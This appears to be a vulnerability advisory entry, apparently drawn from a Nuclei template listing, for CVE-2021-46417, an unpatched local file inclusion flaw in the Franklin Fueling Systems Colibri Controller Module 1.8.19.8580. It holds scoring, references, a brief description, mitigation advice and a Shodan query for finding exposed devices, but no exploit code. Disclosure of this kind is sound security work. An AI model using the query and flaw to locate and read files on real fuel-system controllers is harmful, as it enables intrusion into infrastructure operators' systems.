Vendor: Colibri Controller Module
By: Momen Eldawakhly (Cyber Guy)
CVSS: 7.5 (HIGH)
Local File Inclusion (LFI)
CWE: 22
Product Name: Colibri Controller Module
Affected Version From: 1.8.19.8580
Affected Version To: 1.8.19.8580
Patch Exists: NO
Related CVE: CVE-2021-46417
CPE: a:franklin_fueling_systems:colibri_controller_module:1.8.19.8580
Tags: packetstorm,cve,cve2021,franklinfueling,lfi
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Nuclei References:
https://packetstormsecurity.com/files/166671/Franklin-Fueling-Systems-Colibri-Controller-Module-1.8.19.8580-Local-File-Inclusion.html
https://drive.google.com/drive/folders/1Yu4aVDdrgvs-F9jP3R8Cw7qo_TC7VB-R
http://packetstormsecurity.com/files/166610/FFS-Colibri-Controller-Module-1.8.19.8580-Directory-Traversal.html
https://nvd.nist.gov/vuln/detail/CVE-2021-46417
Nuclei Metadata: {'max-request': 1, 'shodan-query': 'http.html:"Franklin Fueling Systems"', 'verified': True, 'vendor': 'franklinfueling', 'product': 'colibri_firmware'}
Platforms Tested: Linux
2022
Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 – Local File Inclusion (LFI)
The Franklin Fueling Systems Colibri Controller Module version 1.8.19.8580 is affected by a local file inclusion (LFI) vulnerability. An attacker can exploit it to read arbitrary files on the target system.
Mitigation:
The vendor has not provided a patch or mitigation for this vulnerability at the time of writing. It is recommended to restrict access to the affected module and regularly monitor for any unauthorized access or activity.